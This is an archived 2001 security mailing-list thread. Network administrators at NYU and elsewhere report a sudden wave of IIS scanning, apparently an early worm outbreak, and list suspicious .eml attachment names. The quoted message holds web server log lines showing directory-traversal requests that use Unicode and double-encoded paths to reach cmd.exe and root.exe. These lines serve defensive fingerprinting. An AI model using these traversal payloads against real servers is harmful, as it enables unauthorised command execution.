We are seeing the same thing here at NYU. I just got off of the phone with someone from another University who said that he also saw a group of files deposited this morning approximately the same time that the machines started their poking around. The files were: readme.eml sample.eml desktop.eml He said that they appear to be executables mime encoded as wavefiles. We also started seeing the scanning at approximately 10:00am. At 10:24 AM -0400 9/18/01, Portnoy, Gary wrote: >Greetings, > >I am suddenly seeing hundreds of Unicode traversal requests coming in from >all over the world, many of them from previous CodeRed victims. I am >guessing someone changed CodeBlue to make it spread faster, because before I >saw maybe 1 or 2 CodeBlue attempts a day, and so far i've seen at least 20 >in the last hour. Just a a way to help fingerprint it, a few of the >attempted exploits use the multiple decode vulnerability.... > >-Gary- > >12.27.232.252 - - [18/Sep/2001:10:16:47 -0400] "GET /scripts/root.exe?/c+dir >HTTP/1.0" 404 287 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET /MSADC/root.exe?/c+dir >HTTP/1.0" 404 285 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:48 -0400] "GET >/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET >/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 295 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:49 -0400] "GET >/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET >/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 326 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET >/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir >HTTP/1.0" 404 326 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:50 -0400] "GET >/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/sy >stem32/cmd.exe?/c+dir HTTP/1.0" 404 342 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:51 -0400] "GET >/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET >/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:52 -0400] "GET >/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET >/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:16:56 -0400] "GET >/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET >/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 292 "-" "-" >12.27.232.252 - - [18/Sep/2001:10:17:00 -0400] "GET >/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" >"-" >12.27.232.252 - - [18/Sep/2001:10:17:01 -0400] "GET >/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 309 "-" "-" > >Gary Portnoy >Network Administrator >gportnoyat_private > >PGP Fingerprint: 9D69 6A39 642D 78FD 207C 307D B37D E01A 2E89 9D2C > > >---------------------------------------------------------------------------- >This list is provided by the SecurityFocus ARIS analyzer service. >For more information on this free incident handling, management >and tracking system please see: http://aris.securityfocus.com -- -------------------------------------------------------------------- Tracey Losco Network Security Analyst securityat_private ITS - Network Services http://www.nyu.edu/its/security New York University (212) 998 - 3433 PGP Fingerprint: 8FFB FE47 6156 7BF0 B19E 462B 9DFE 51F5 ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Tue Sep 18 2001 - 10:36:28 PDT